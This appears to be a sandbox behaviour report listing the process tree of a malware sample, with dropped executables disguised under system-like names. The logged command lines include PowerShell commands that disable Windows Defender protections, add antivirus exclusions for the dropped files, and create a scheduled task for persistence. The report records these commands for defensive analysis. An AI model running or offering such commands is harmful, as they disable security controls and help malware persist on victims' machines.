        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3764
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:5052
- C:\Users\Admin\AppData\Local\Temp\Installer.exe
  "C:\Users\Admin\AppData\Local\Temp\Installer.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4980
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpA9BD.tmp.bat""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3440
  - - C:\Windows\SysWOW64\chcp.com
      chcp 65001
      4⤵
      PID:2084
  - - C:\Windows\SysWOW64\timeout.exe
      timeout 2
      4⤵
      Delays execution with timeout.exe
      PID:3040
- - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
    "C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe"
    3⤵
    - Disables RegEdit via registry modification
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops autorun.inf file
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:852
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\watchdog.vbs.bat""
      4⤵
      Checks computer location settings
      Modifies registry class
      PID:4744
    - - C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        5⤵
        
        PID:1500
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\watchdog.vbs"
        5⤵
        
        PID:3572
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        Executes dropped EXE
        
        PID:3692
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        Executes dropped EXE
        
        PID:4724
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        Executes dropped EXE
        
        PID:4028
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        Executes dropped EXE
        
        PID:4928
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        Executes dropped EXE
        
        PID:368
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        Executes dropped EXE
        
        PID:3076
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        Executes dropped EXE
        
        PID:4452
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        Executes dropped EXE
        
        PID:3492
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        Executes dropped EXE
        
        PID:3804
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        Executes dropped EXE
        
        PID:3524
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        Executes dropped EXE
        
        PID:4060
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        Executes dropped EXE
        
        PID:5004
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        Executes dropped EXE
        
        PID:3536
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        Executes dropped EXE
        
        PID:1964
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        Executes dropped EXE
        
        PID:1556
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        Executes dropped EXE
        
        PID:4028
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        Executes dropped EXE
        
        PID:2848
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        Executes dropped EXE
        
        PID:2180
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        Executes dropped EXE
        
        PID:2784
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        Executes dropped EXE
        
        PID:3624
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        Executes dropped EXE
        
        PID:660
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        Executes dropped EXE
        
        PID:1412
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        Executes dropped EXE
        
        PID:1380
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        Executes dropped EXE
        
        PID:3868
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        Executes dropped EXE
        
        PID:1160
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        Executes dropped EXE
        
        PID:2204
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        Executes dropped EXE
        
        PID:1056
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        Executes dropped EXE
        
        PID:1796
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        Executes dropped EXE
        
        PID:4364
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        Executes dropped EXE
        
        PID:4944
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        Executes dropped EXE
        
        PID:2140
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        Executes dropped EXE
        
        PID:3884
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        Executes dropped EXE
        
        PID:2116
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        Executes dropped EXE
        
        PID:3472
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        Executes dropped EXE
        
        PID:844
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        Executes dropped EXE
        
        PID:3880
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        Executes dropped EXE
        
        PID:3628
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        Executes dropped EXE
        
        PID:1444
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        
        PID:528
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        
        PID:1116
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        
        PID:4784
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        
        PID:4036
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        
        PID:4504
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        
        PID:4480
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        
        PID:2376
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        
        PID:3188
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        
        PID:980
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        
        PID:4840
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        
        PID:1620
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        
        PID:2800
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        
        PID:1928
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        
        PID:1588
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        
        PID:1928
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        
        PID:3920
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        
        PID:4272
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        
        PID:3220
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        
        PID:1264
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        
        PID:2280
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        
        PID:4160
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        
        PID:2016
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        
        PID:2284
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        
        PID:4572
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        
        PID:3832
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        
        PID:2776
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        
        PID:4148
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        
        PID:1472
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        
        PID:1376
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        
        PID:4612
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        
        PID:3904
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        
        PID:316
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        
        PID:876
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        
        PID:3804
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        
        PID:3432
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        
        PID:1408
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        
        PID:3156
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        
        PID:5004
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        
        PID:4960
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        
        PID:2428
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        
        PID:3232
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        
        PID:1556
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        
        PID:2428
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        
        PID:848
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        
        PID:1692
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        
        PID:2124
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        
        PID:456
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        
        PID:2396
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        
        PID:4324
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        
        PID:2996
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        
        PID:1324
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        
        PID:4976
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        
        PID:2028
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        
        PID:1768
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        
        PID:1160
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        
        PID:4020
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        
        PID:4760
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        
        PID:1816
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        
        PID:4620
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        
        PID:4952
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        
        PID:1752
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        
        PID:4036
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        
        PID:4152
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        
        PID:4028
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        
        PID:1624
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        
        PID:2860
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        
        PID:4876
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        
        PID:8
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        
        PID:4688
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        
        PID:3672
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        
        PID:4756
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        
        PID:3196
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        
        PID:4880
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        
        PID:4732
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        
        PID:1584
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        
        PID:4940
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        
        PID:1892
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        
        PID:3436
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        
        PID:2464
      - C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        
        C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe
        6⤵
        
        PID:1908
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp8C13.tmp.bat""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2076
- C:\Users\Admin\AppData\Local\Temp\ms_host.exe
  "C:\Users\Admin\AppData\Local\Temp\ms_host.exe"
  2⤵
  - Checks computer location settings
  - Drops startup file
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1948
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\ms_host.exe'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4660
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'ms_host.exe'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4156
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\microsoftsoftware_sv.exe'
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:8
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'microsoftsoftware_sv.exe'
    3⤵
    - Loads dropped DLL
    - Suspicious use of AdjustPrivilegeToken
    PID:4132
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "microsoftsoftware_sv" /tr "C:\Users\Admin\AppData\Local\Temp\microsoftsoftware_sv.exe"
    3⤵
    - Creates scheduled task(s)
    PID:2688
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /delete /f /tn "microsoftsoftware_sv"
    3⤵
    PID:4316
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp553.tmp.bat""
    3⤵
    PID:4332
  - - C:\Windows\system32\timeout.exe
      timeout 3
      4⤵
      Loads dropped DLL
      Delays execution with timeout.exe
      PID:1680

C:\Windows\system32\timeout.exe
timeout 3
1⤵
- Delays execution with timeout.exe
PID:944

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:100

C:\Users\Admin\AppData\Local\Temp\microsoftsoftware_sv.exe
C:\Users\Admin\AppData\Local\Temp\microsoftsoftware_sv.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2352

C:\Users\Admin\AppData\Local\Temp\svhost
C:\Users\Admin\AppData\Local\Temp\svhost
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:792

C:\Users\Admin\AppData\Local\Temp\microsoftsoftware_sv.exe
C:\Users\Admin\AppData\Local\Temp\microsoftsoftware_sv.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:4356

C:\Users\Admin\AppData\Local\Temp\svhost
C:\Users\Admin\AppData\Local\Temp\svhost
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4552

C:\Users\Admin\AppData\Local\Temp\microsoftsoftware_sv.exe
C:\Users\Admin\AppData\Local\Temp\microsoftsoftware_sv.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4912

C:\Users\Admin\AppData\Local\Temp\svhost
C:\Users\Admin\AppData\Local\Temp\svhost
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2356

C:\Users\Admin\AppData\Local\Temp\microsoftsoftware_sv.exe
C:\Users\Admin\AppData\Local\Temp\microsoftsoftware_sv.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3520

C:\Users\Admin\AppData\Local\Temp\svhost
C:\Users\Admin\AppData\Local\Temp\svhost
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2084

C:\Users\Admin\AppData\Local\Temp\microsoftsoftware_sv.exe
C:\Users\Admin\AppData\Local\Temp\microsoftsoftware_sv.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:100

C:\Users\Admin\AppData\Local\Temp\svhost
C:\Users\Admin\AppData\Local\Temp\svhost
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2256

C:\Users\Admin\AppData\Local\Temp\microsoftsoftware_sv.exe
C:\Users\Admin\AppData\Local\Temp\microsoftsoftware_sv.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4512

C:\Users\Admin\AppData\Local\Temp\svhost
C:\Users\Admin\AppData\Local\Temp\svhost
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:672

C:\Users\Admin\AppData\Local\Temp\microsoftsoftware_sv.exe
C:\Users\Admin\AppData\Local\Temp\microsoftsoftware_sv.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3056

C:\Users\Admin\AppData\Local\Temp\svhost
C:\Users\Admin\AppData\Local\Temp\svhost
1⤵
- Loads dropped DLL
PID:4368

C:\Users\Admin\AppData\Local\Temp\microsoftsoftware_sv.exe
C:\Users\Admin\AppData\Local\Temp\microsoftsoftware_sv.exe
1⤵
- Loads dropped DLL
PID:4376

C:\Users\Admin\AppData\Local\Temp\svhost
C:\Users\Admin\AppData\Local\Temp\svhost
1⤵
- Loads dropped DLL
PID:2764

C:\Users\Admin\AppData\Local\Temp\microsoftsoftware_sv.exe
C:\Users\Admin\AppData\Local\Temp\microsoftsoftware_sv.exe
1⤵
- Loads dropped DLL
PID:4556

C:\Users\Admin\AppData\Local\Temp\svhost
C:\Users\Admin\AppData\Local\Temp\svhost
1⤵
- Loads dropped DLL
PID:4860

C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe
1⤵
- Loads dropped DLL
PID:568

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k UnistackSvcGroup
1⤵
- Loads dropped DLL
PID:1104

C:\Users\Admin\AppData\Local\Temp\svhost
C:\Users\Admin\AppData\Local\Temp\svhost
1⤵
- Loads dropped DLL
PID:2784

C:\Users\Admin\AppData\Local\Temp\svhost
C:\Users\Admin\AppData\Local\Temp\svhost
1⤵
- Loads dropped DLL
PID:528

C:\Users\Admin\AppData\Local\Temp\svhost
C:\Users\Admin\AppData\Local\Temp\svhost
1⤵
PID:2756

C:\Users\Admin\AppData\Local\Temp\svhost
C:\Users\Admin\AppData\Local\Temp\svhost
1⤵
PID:4368

C:\Users\Admin\AppData\Local\Temp\svhost
C:\Users\Admin\AppData\Local\Temp\svhost
1⤵
PID:2972

C:\Users\Admin\AppData\Local\Temp\svhost
C:\Users\Admin\AppData\Local\Temp\svhost
1⤵
PID:1108

